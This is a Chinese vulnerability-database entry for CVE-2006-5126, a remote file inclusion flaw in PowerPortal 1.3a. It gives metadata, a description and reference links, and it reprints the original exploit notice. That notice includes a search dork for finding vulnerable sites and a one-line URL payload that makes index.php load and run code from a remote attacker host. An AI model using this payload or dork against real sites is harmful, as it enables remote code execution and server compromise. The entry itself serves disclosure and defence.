John Himmelman PowerPortal 'Index.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111171 漏洞类型 输入验证
发布时间 2006-09-29 更新时间 2006-10-04
CVE编号 CVE-2006-5126 CNNVD-ID CNNVD-200610-009
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2454
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-009
|漏洞详情
JohnHimmelman(也称为DaRk2k1)PowerPortal1.3a的index.php中存在PHP远程文件包含漏洞。远程攻击者通过file_name[]参数中的URL执行任意PHP代码。
|漏洞EXP
#==============================================================================================
# PowerPortal Remote File Include
#===============================================================================================
#
#Critical Level : Dangerous
#
# scripts: PowerPortal
# download: http://www.scripts.com/jump.php?ID=13698
#Version : v1.3a
#dork : Powered by PowerPortal v1.3a
# note not tested on other version :)
#================================================================================================
#Bug in :
#/index.php
#
#================================================================================================
#Vuln Code :
# think :)
#================================================================================================
#
#Exploit :
#
#http://localhost/path_to_PowerPortal/index.php?file_name[]=http://eivlCode.txt?
#
#
#================================================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad ; RooT-shilL ; hetler_jeddah ; BooB11 ; FaTaL ; 
ThE-WoLf-KsA ; mohandko ; fooooz ; maVen
#thanx to str0ke :)
#and all members in XP10_hackEr Team
#WWW.XP10.COM
==================================================================================================

# milw0rm.com [2006-09-29]
|参考资料

来源:XF
名称:powerportal-index-file-include(29264)
链接:http://xforce.iss.net/xforce/xfdb/29264
来源:BID
名称:20262
链接:http://www.securityfocus.com/bid/20262
来源:MILW0RM
名称:2454
链接:http://www.milw0rm.com/exploits/2454
来源:SECUNIA
名称:22209
链接:http://secunia.com/advisories/22209
来源:MILW0RM
名称:2454
链接:http://milw0rm.com/exploits/2454